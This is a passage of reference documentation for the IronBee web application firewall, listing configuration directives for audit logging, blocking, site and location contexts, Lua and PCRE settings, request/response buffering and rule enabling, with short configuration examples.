Version|0.6\n|===============================================================================\n\n=== AuditLogIndex\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the audit log index file.\n| Syntax|`AuditLogIndex None\\|<location>`\n| Default|`ironbee-index.log`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nRelative filenames are based off the `AuditLogBaseDir` directory and\nspecifying `None` disables the index file entirely.\n
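\nFor example, to write audit log entries under a custom base directory with\nthe index file kept alongside them (a minimal sketch; the locations are\nhypothetical):\n\n---------------------------------\n# hypothetical locations\nAuditLogBaseDir \/var\/log\/ironbee\nAuditLogIndex audit-index.log\n---------------------------------\n\n=== 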
AuditLogIndexFormat\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the format of the entries logged in the audit log index file.\n| Syntax|`AuditLogIndexFormat <format>`\n| Default|`%T %h %a %S %s %t %f`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n* *%%* The percent sign\n* *%a* Remote IP-address\n* *%A* Local IP-address\n* *%h* HTTP Hostname\n* *%s* Site ID\n* *%S* Sensor ID\n* *%t* Transaction ID\n* *%T* Transaction timestamp (YYYY-MM-DDTHH:MM:SS.ssss+\/-ZZZZ)\n* *%f* Audit log filename (relative to `AuditLogBaseDir`)\n\n=== AuditLogParts\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures which parts will be logged to the audit log.\n| Syntax|`AuditLogParts <options>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nAn audit log consists of many parts; `AuditLogParts` determines which\nparts are recorded by default. The parts are inherited into child\ncontexts (Site, Location, etc). Specifying a part with a +\/- operator will\nadd or remove the given part from the current set of parts. Specifying\nthe first option without +\/- operators will cause all options to be\noverridden and the list of options will be the only options set. Here is\nwhat your configuration might look like:\n\n-------------------------------------------------------------------\nAuditLogParts minimal +request -requestBody +response -responseBody\n-------------------------------------------------------------------\n\nThe above first resets the list of parts to *minimal*, adds all the\n*request* parts except the *requestBody*, then adds all the *response*\nparts except the *responseBody*.\n\nLater, in a sub-context, you may wish to enable response body logging\nand thus can just specify this part with the + operator:\n\n----------------------\n<Location \/some\/path>\n AuditLogParts +responseBody\n<\/Location>\n----------------------\n\nIf you already had response body logging enabled, but didn't want it any\nmore, you would write:\n\n----------------------\n<Location \/some\/path>\n AuditLogParts -responseBody\n<\/Location>\n----------------------\n\nAudit Log Part Names:\n\n* *header:* Audit Log header (required)\n* *events:* List of triggered events\n* *requestMetadata:* Information about the request\n* *requestHeaders:* Raw request headers\n* *requestBody:* Raw request body\n* *requestTrailers:* Raw request trailers\n* *responseMetadata:* Information about the response\n* *responseHeaders:* Raw response headers\n* *responseBody:* Raw response body\n* *responseTrailers:* Raw response trailers\n* *debugFields:* Currently not implemented\n\nAudit Log Part Group Names:\n\nThese are just aliases for multiple parts.\n\n* *none:* Removes all parts\n* *minimal:* Minimal parts (currently *header* and *events* parts)\n* *default:* Default parts (currently *minimal* and request\/response\nparts without bodies)\n* *request:* All request related parts\n* *response:* All response related parts\n* *debug:* All debug related parts\n* *all:* All parts\n\n=== AuditLogSubDirFormat\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the directory structure created under the `AuditLogBaseDir` directory. 
This is a +strftime(3)+ format string allowing the directory structure to be created based on date\/time.\n| Syntax|`AuditLogSubDirFormat <format>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== AuthBasicRealm\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the Basic Auth Realm used to challenge a user.\n| Syntax|`AuthBasicRealm <realm-string>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident_authbasic\n| Version|0.8\n|===============================================================================\n\n=== BlockingMethod\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the default blocking method.\n| Syntax|`BlockingMethod status=<code> \\| close`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.8\n|===============================================================================\n\n=== DefaultBlockStatus\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the default HTTP status code used for blocking.\n| Syntax|`DefaultBlockStatus <status>`\n| Default|`403`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== ErrorPageMap\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the error page contents for a given status code.\n| Syntax|`ErrorPageMap <http-status-code> <file>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|error_page\n| Version|0.9\n|===============================================================================\n\nWhen an error page is generated (blocked), the status code is mapped to a file to\ndeliver as the body.\n
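\nFor example, to serve a custom page body when a transaction is blocked with\na 403 status (a minimal sketch; the file path is hypothetical):\n\n--------------------------------------------\n# hypothetical error page file\nErrorPageMap 403 \/usr\/local\/ironbee\/403.html\n--------------------------------------------\n\n=== FastAutomata\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads the automata for \"fast\" rules.\n| Syntax|`FastAutomata <automata-file>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|fast\n| Version|0.9\n|===============================================================================\n\n=== GeoIPDatabaseFile\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the geoip database file.\n| Syntax|`GeoIPDatabaseFile <geoip-db-file>`\n| Default|`\/usr\/share\/geoip\/GeoLiteCity.dat`\n| Context|Any\n|Cardinality|0..1\n| Module|geoip\n| Version|0.4\n|===============================================================================\n\n=== Hostname\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Maps hostnames to a Site.\n| Syntax|`Hostname <hostname>`\n| Default|`*` (any)\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThe `Hostname` directive establishes a mapping between a Site and one or\nmore hostnames. 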
To map IP\/Port pairs to a Site, see the `Service`\ndirective.\n\nIn the simplest case, a site will occupy a single hostname:\n\n------------------------\nHostname www.ironbee.com\n------------------------\n\nMore often than not, however, several names will be used:\n\n------------------------\nHostname www.ironbee.com\nHostname ironbee.com\n------------------------\n\nWildcards are permitted when there are multiple names under a common\ndomain. Only one wildcard character per hostname is allowed and it must\ncurrently be on the left-hand side:\n\n----------------------\nHostname ironbee.com\nHostname *.ironbee.com\n----------------------\n\nFinally, to match any hostname (which you will need to do in default\nsites), use a single asterisk, which is the default if no `Hostname`\ndirective is specified for a site:\n\n----------\nHostname *\n----------\n\n=== IdentMode\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configure the ident mode.\n| Syntax|`IdentMode <mode>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident\n| Version|0.8\n|===============================================================================\n\n=== IdentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configure the ident type.\n| Syntax|`IdentType <type>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident\n| Version|0.8\n|===============================================================================\n\n=== Include\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Includes an external file into the configuration.\n| Syntax|`Include <file>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.5\n|===============================================================================\n\nAllows inclusion of another file into the current configuration file.\nThe following line will include the contents of the file `sites.conf`\ninto the configuration:\n\n-----------------------\nInclude conf\/sites.conf\n-----------------------\n\nThe file must exist and be accessible or an error is generated (use\n`IncludeIfExists` if this is not the case). If you specify a relative\npath, the location of the configuration file containing this directive\nwill be used to resolve it.\n\n=== IncludeIfExists\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Includes an external file into the configuration if it exists and is accessible.\n| Syntax|`IncludeIfExists <file>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.7\n|===============================================================================\n\nAs `Include`, but allows for optional inclusion without causing a\nconfiguration error if the file does not exist (as would the `Include`\ndirective).\n\n=== InitCollection\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Initializes a locally scoped collection data field for later use and optional persistence.\n| Syntax|`InitCollection <uri> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|initcollection, persist\n| Version|0.7\n|===============================================================================\n\nInitializes a collection from the initializer. The initializer format\ndepends on the implementation. 
There are multiple URI formats supported,\nwhich are described below.\n\nCore Functionality\n^^^^^^^^^^^^^^^^^^\n\n`vars: key1=val1 key2=val2 ... keyN=valN`\n\nThe `vars` URI allows initializing a collection of simple key\/value\npairs.\n\n----------------------------------------------------\nInitCollection MY_VARS vars: key1=value1 key2=value2\n----------------------------------------------------\n\n`json-file:\/\/\/path\/file.json [persist]`\n\nThe `json-file` URI allows loading a more complex collection from a JSON\nformatted file. If the optional `persist` parameter is specified, then\nanything changed is persisted back to the file at the end of the\ntransaction. Next time the collection is initialized, it will be\ninitialized from the persisted data.\n\n-----------------------------------------------------------------------------------------------\nInitCollection MY_JSON_COLLECTION json-file:\/\/\/tmp\/ironbee\/persist\/test1.json\nInitCollection MY_PERSISTED_JSON_COLLECTION json-file:\/\/\/tmp\/ironbee\/persist\/test2.json persist\n-----------------------------------------------------------------------------------------------\n\n=== InitVar\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Initializes a locally scoped variable data field for later use.\n| Syntax|`InitVar <name> <value>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n
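\nFor example, to seed a simple variable that later rules can reference (a\nminimal sketch; the name and value are hypothetical):\n\n-----------------------------\n# hypothetical name and value\nInitVar MY_MODE \"audit\"\n-----------------------------\n\n=== InspectionEngineOptions\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures options for the inspection engine.\n| Syntax|`InspectionEngineOptions <options>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.7\n|===============================================================================\n\nThe inspection engine allows setting options; `InspectionEngineOptions`\ncontrols these options. The options are inherited into child contexts\n(Site, Location, etc). Specifying an option with a +\/- operator will add\nor remove the given option from the current set. Specifying the first\noption without +\/- operators will cause all options to be overridden and\nthe list of options will be the only options set. 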
Here is what your\nconfiguration might look like:\n\n-------------------------------------\nInspectionEngineOptions all -response\n-------------------------------------\n\nThe above first resets the inspection to *all*, then removes the\n*response* from being inspected.\n\nLater, in a sub-context, you may wish to enable response\ninspection and thus can just specify this part with the + operator:\n\n-------------------------------------\n<Location \/some\/path>\n InspectionEngineOptions +response\n<\/Location>\n-------------------------------------\n\nIf you already had response inspection enabled, but no longer wanted it,\nyou would write:\n\n-------------------------------------\n<Location \/some\/other\/path>\n InspectionEngineOptions -response\n<\/Location>\n-------------------------------------\n\nInspection Engine Options::\n* *requestHeader:* Inspect the HTTP request header (default)\n* *requestBody:* Inspect the HTTP request body\n* *responseHeader:* Inspect the HTTP response header\n* *responseBody:* Inspect the HTTP response body\n\nInspection Engine Option Group Names::\n* *none:* Removes all options\n* *default:* Default options (currently request header only)\n* *request:* All request related options\n* *response:* All response related options\n* *all:* All options\n\n=== LoadEudoxus\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads an external Eudoxus Automata into IronBee.\n| Syntax|`LoadEudoxus <name> <automata-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|ee\n| Version|0.7\n|===============================================================================\n\nThis directive will load an external eudoxus automata from `file` into\nthe engine with the given `name`. Once loaded, the automata can then be\nused with the associated eudoxus rule operators such as the\n`ee_match_any` operator.\n\nThe eudoxus automata is a precompiled and optimized automata generated\nby the ac_generator and ec commands in the `automata\/bin` directory.\nCurrently, as of IronBee 0.7, a modified Aho-Corasick algorithm is\nimplemented which can handle very large external dictionaries. Refer to\nthe\nhttps:\/\/www.ironbee.com\/docs\/devexternal\/ironautomata.html[IronAutomata\nDocumentation] for more information.\n
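\nFor example, to load a precompiled automata under a name that the eudoxus\noperators can then reference (a minimal sketch; the name and path are\nhypothetical):\n\n----------------------------------------------------\n# hypothetical automata name and file\nLoadEudoxus bad_paths \/usr\/local\/ironbee\/bad_paths.e\n----------------------------------------------------\n\n=== LoadModule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads an external module into the configuration.\n| Syntax|`LoadModule <module-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis directive will add an external module to the engine, potentially\nmaking new directives available to the configuration.\n\n=== Location\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a subcontext that can have a different configuration.\n| Syntax|`<Location path>...<\/Location>`\n| Default|None\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nA sub-context created by this directive initially has identical\nconfiguration to that of the site it belongs to. Further directives are\nrequired to introduce changes. Locations are evaluated in the order in\nwhich they appear in the configuration file. The first location that\nmatches the request path will be used. 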
This means that you should put the\nmost-specific location first, followed by the less specific ones.\n\n---------------------------------------\nInclude rules.conf\n\n<Site site1>\n Service *:80\n Service 10.0.1.2:443\n Hostname site1.example.com\n\n <Location \/prefix\/app1>\n RuleEnable all\n <\/Location>\n\n <Location \/prefix>\n RuleEnable tag:GenericRules\n <\/Location>\n<\/Site>\n---------------------------------------\n\n=== Log\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the log file.\n| Syntax|`Log <location>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== LogLevel\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the detail level of the entries recorded to the log.\n| Syntax|`LogLevel <level>`\n| Default|`warning`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThe following log levels are supported (either numeric or text)::\n* *0 - emergency* - system unusable\n* *1 - alert* - crisis happened\n* *2 - critical* - crisis coming\n* *3 - error* - error occurred\n* *4 - warning* - error likely to occur\n* *5 - notice* - something unusual happened\n* *6 - info* - informational messages\n* *7 - debug* - debugging: transaction state changes\n* *8 - debug2* - debugging: log of activities carried out\n* *9 - debug3* - debugging: activities, with more detail\n* *10 - trace* - debugging: developer log messages\n\n=== LuaLoadModule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Load a Lua module (similar to LoadModule).\n| Syntax|`LuaLoadModule <lua-module-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n--------------------------------\nLuaLoadModule \"threat_level.lua\"\n--------------------------------\n\n=== LuaInclude\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Execute a Lua script as a configuration file.\n| Syntax|`LuaInclude <lua-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n----------------------\nLuaInclude \"rules.lua\"\n----------------------\n\n=== LuaPackageCPath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the Lua C package path.\n| Syntax|`LuaPackageCPath <lua-cpath>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n=== LuaPackagePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the Lua package path.\n| Syntax|`LuaPackagePath <lua-path>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n
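\nFor example, to let Lua modules and rules `require` files from a custom\ndirectory (a minimal sketch; the path is hypothetical and uses Lua's `?`\nplaceholder convention):\n\n--------------------------------------------\n# hypothetical Lua package path\nLuaPackagePath \/usr\/local\/ironbee\/lua\/?.lua\n--------------------------------------------\n\n=== 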
LuaSet\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Set a named configuration parameter in a Lua module.\n| Syntax|`LuaSet <lua-module-name> <name> <value>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n----------------------------------------------\nLuaLoadModule \"my-lua-module.lua\"\n...\nLuaSet \"my-lua-module.lua\" MY_VAR \"some value\"\n----------------------------------------------\n\n=== ModuleBasePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the base path where IronBee modules are loaded.\n| Syntax|`ModuleBasePath <path>`\n| Default|The `libexec` directory under the IronBee install prefix.\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== PcreDfaWorkspaceSize\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE DFA workspace size.\n| Syntax|`PcreDfaWorkspaceSize <size>`\n| Default|200\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreJitStackMax\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE stack maximum size.\n| Syntax|`PcreJitStackMax <size>`\n| Default|0 (auto)\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreJitStackStart\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE stack starting size.\n| Syntax|`PcreJitStackStart <size>`\n| Default|0 (auto)\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreMatchLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library match limit.\n| Syntax|`PcreMatchLimit <limit>`\n| Default|5000\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\nFrom the `pcreapi` manual: ``The match_limit field provides a means of\npreventing PCRE from using up a vast amount of resources when running\npatterns that are not going to match, but which have a very large number\nof possibilities in their search trees. The classic example is a pattern\nthat uses nested unlimited repeats.''\n\n=== PcreMatchLimitRecursion\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library match limit recursion.\n| Syntax|`PcreMatchLimitRecursion <limit>`\n| Default|5000\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\nFrom the `pcreapi` manual: ``The match_limit_recursion field is similar\nto match_limit, but instead of limiting the total number of times that\nmatch() is called, it limits the depth of recursion. 
The recursion depth\nis a smaller number than the total number of calls, because not all\ncalls to match() are recursive. This limit is of use only if it is set\nsmaller than match_limit.''\n\n=== PcreStudy\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE \"study\" option.\n| Syntax|`PcreStudy On \\| Off`\n| Default|On\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreUseJit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library to use the JIT.\n| Syntax|`PcreUseJit On \\| Off`\n| Default|On\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PersistenceMap\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Map a collection to a persistence store.\n| Syntax|`PersistenceMap <collection> <store> [key=value]`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|persistence_framework, persist\n| Version|0.7\n|===============================================================================\n\nSee: <<_persisting_collections>>\n\n=== PersistenceStore\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a persistence store.\n| Syntax|`PersistenceStore <name> <uri>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|persistence_framework, persist\n| Version|0.7\n|===============================================================================\n\nSee: <<_persisting_collections>>\n\n=== PredicateAssertValid\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Validate predicate, write a predicate report to file or stderr and abort on error.\n| Syntax|`PredicateAssertValid <file> \\| \"\"`\n| Default|\"\" (stderr)\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.8\n|===============================================================================\n\n=== PredicateDebugReport\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Write a predicate debug report to file or stderr.\n| Syntax|`PredicateDebugReport <file> \\| \"\"`\n| Default|\"\" (stderr)\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.8\n|===============================================================================\n\n=== PredicateDefine\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a predicate template.\n| Syntax|`PredicateDefine ...`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.9\n|===============================================================================\n\n=== PredicateTrace\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable predicate trace output to file or stderr.\n| Syntax|`PredicateTrace <file> \\| \"\"`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.9\n|===============================================================================\n\n=== 
ProtectionEngineOptions\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures options for the protection engine.\n| Syntax|`ProtectionEngineOptions ...`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.8\n|===============================================================================\n\nThe protection engine allows setting options; `ProtectionEngineOptions`\ncontrols these options. The options are inherited into child contexts\n(Site, Location, etc). Specifying an option with a +\/- operator will add\nor remove the given option from the current set. Specifying the first\noption without +\/- operators will cause all options to be overridden and\nthe list of options will be the only options set. Here is what your\nconfiguration might look like:\n\n----------------------------\nProtectionEngineOptions none\n----------------------------\n\nThe above resets the option set to *none*.\n\nLater, in a sub-context, you may wish to enable blocking and thus can\njust specify this with the + operator:\n\n-----------------------------------------\n<Location \/some\/path>\n ProtectionEngineOptions +blockingMode\n<\/Location>\n-----------------------------------------\n\nIf you already had blocking mode enabled, but did not want it any more,\nyou would write:\n\n-----------------------------------------\n<Location \/some\/other\/path>\n ProtectionEngineOptions -blockingMode\n<\/Location>\n-----------------------------------------\n\nProtection Engine Options::\n* *blockingMode:* Control blocking actions.\n\nProtection Engine Option Group Names::\n* *none:* Removes all options\n* *default:* Default options (currently none)\n* *all:* All options\n\n=== RequestBodyBufferLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the request body buffer.\n| Syntax|`RequestBodyBufferLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== RequestBodyBufferLimitAction\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures what happens when the buffer is smaller than the request body.\n| Syntax|`RequestBodyBufferLimitAction FlushAll \\| FlushPartial`\n| Default|FlushPartial\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\nWhen `FlushAll` is configured, the transaction with a body larger than\nthe buffer will flush the existing buffer, sending it to the backend,\nthen continue to fill the buffer with the remaining data. With\n`FlushPartial` selected, the buffer will be used to keep as much data as\npossible, but any overflowing data will be flushed and sent to the\nbackend. 
Request headers will be sent before the first overflow batch.\n\n=== RequestBodyLogLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the request body logged to an audit log.\n| Syntax|`RequestBodyLogLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== RequestBuffering\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/disable request buffering.\n| Syntax|`RequestBuffering On \\| Off`\n| Default|`Off`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\nControls request buffering - holding the request during inspection.\nCurrently the HTTP header is always buffered, but this must be enabled\nfor the request body to be buffered.\n\nNOTE: This may be renamed to `RequestBodyBuffering` in a future release.\n
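\nFor example, to buffer request bodies and cap both the inspection buffer and\nthe copy written to the audit log (a minimal sketch; the byte limits are\nhypothetical):\n\n-----------------------------------------\n# hypothetical limits, in bytes\nRequestBuffering On\nRequestBodyBufferLimit 131072\nRequestBodyBufferLimitAction FlushPartial\nRequestBodyLogLimit 32768\n-----------------------------------------\n\n=== ResponseBodyBufferLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the response body buffer.\n| Syntax|`ResponseBodyBufferLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== ResponseBodyBufferLimitAction\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures what happens when the buffer is smaller than the response body.\n| Syntax|`ResponseBodyBufferLimitAction FlushAll \\| FlushPartial`\n| Default|FlushPartial\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\nWhen `FlushAll` is configured, the transaction with a body larger than\nthe buffer will flush the existing buffer, sending it to the client,\nthen continue to fill the buffer with the remaining data. With\n`FlushPartial` selected, the buffer will be used to keep as much data as\npossible, but any overflowing data will be flushed and sent to the\nclient. 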
Response headers will be sent before the first overflow batch.\n\n=== ResponseBodyLogLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the response body logged to an audit log.\n| Syntax|`ResponseBodyLogLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== ResponseBuffering\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/disable response buffering.\n| Syntax|`ResponseBuffering On \\| Off`\n| Default|`Off`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\nControls response buffering - holding the response during inspection.\nCurrently the HTTP header is always buffered, but this must be enabled\nfor the response body to be buffered.\n\nNOTE: This may be renamed to `ResponseBodyBuffering` in a future release.\n\n=== Rule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads a rule and, in most contexts, enables the rule for execution in that context.\n| Syntax|`Rule TARGET @operator \"param\" id:1234 rev:1 phase:THE_PHASE ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\n[NOTE]\nLoading a rule will, in most contexts, also enable the rule to be\nexecuted in that context. However, the main configuration context is\nspecial. Loading a rule in the main configuration context will _NOT_\nenable the rule, but just load it into memory so that it can be shared\nby other contexts. You must explicitly use `RuleEnable` in another\ncontext to enable the rule.\n\n=== RuleBasePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the base path where external IronBee rules are loaded.\n| Syntax|`RuleBasePath <path>`\n| Default|The `libexec` directory under the IronBee install prefix.\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== RuleDisable\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Disables a rule from executing in the current configuration context.\n| Syntax|`RuleDisable \"all\" \\| \"id:<id>\" \\| \"tag:<tag>\" ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nRules can be disabled by id or tag. Any number of id or tag modifiers\ncan be specified per directive. All disables are processed after\nenables. See the `RuleEnable` directive for an example.\n\n=== RuleEnable\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enables a rule for execution in the current configuration context.\n| Syntax|`RuleEnable \"all\" \\| \"id:<id>\" \\| \"tag:<tag>\" ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nRules can be enabled by id or tag. 
Any number of id or tag modifiers\ncan be specified per directive. All enables are processed before\ndisables. For example:\n\n------------------------------------------------------------\nInclude \"rules\/big_ruleset.conf\"\n\n<Site foo>\n Hostname foo.example.com\n RuleEnable id:1234\n RuleEnable id:3456 tag:SQLi\n RuleDisable id:5678 tag:experimental tag:heavyweight\n<\/Site>\n------------------------------------------------------------\n\n=== RuleEngineLogData\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the data logged by the rule engine.\n| Syntax|`RuleEngineLogData <options>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.6\n|===============================================================================\n\nThe following data type options are supported:\n\n* *tx* - Log the transaction:\n+\n------------------------------------\nTX_START clientip:port site-hostname\n ...\nTX_END\n------------------------------------\n* *requestLine* - Log the HTTP request line:\n+\n-------------------------------------\nREQ_LINE method uri version-if-given \n-------------------------------------\n* *requestHeader* - Log the HTTP request header:\n+\n----------------------\nREQ_HEADER name: value\n----------------------\n* *requestBody* - Log the HTTP request body, possibly in multiple\nchunks:\n+\n------------------\nREQ_BODY size data\n------------------\n* *responseLine* - Log the HTTP response line:\n+\n--------------------------------\nRES_LINE version status message \n--------------------------------\n* *responseHeader* - Log the HTTP response header:\n+\n----------------------\nRES_HEADER name: value\n----------------------\n* *responseBody* - Log the HTTP response body, possibly in multiple\nchunks:\n+\n------------------\nRES_BODY size data\n------------------\n* *phase* - Log the phase about to execute:\n+\n----------\nPHASE name\n----------\n* *rule* - Log the rule executing:\n+\n--------------------\nRULE_START rule-type\n ...\nRULE_END\n--------------------\n* *target* - Log the target being inspected:\n+\n---------------------------------------------------------------------\nTARGET full-target-name {NOT_FOUND|field-type field-name field-value}\n---------------------------------------------------------------------\n* *transformation* - Log the transformation being executed:\n+\n---------------------------------\nTFN tfn-name(param) {ERROR error}\n---------------------------------\n* *operator* - Log the operator being executed:\n+\n------------------------------------------\nOP op-name(param) TRUE|FALSE {ERROR error}\n------------------------------------------\n* *action* - Log the action being executed:\n+\n---------------------------------------\nACTION action-name(param) {ERROR error}\n---------------------------------------\n* *event* - Log the event being logged:\n+\n--------------------------------------------------------------\nEVENT rule-id type action [confidence\/severity] [csv-tags] msg\n--------------------------------------------------------------\n* *audit* - Log the audit log filename being written:\n+\n------------------------\nAUDIT audit-log-filename\n------------------------\n\nThe following alias options are supported:\n\n* *request* - Alias for: *requestLine*, *requestHeader*, *requestBody*\n* *response* - Alias for: *responseLine*, *responseHeader*,\n*responseBody*\n* *ruleExec* - Alias for: *phase*, *rule*, *target*, *transformation*,\n*operator*, *action*, 
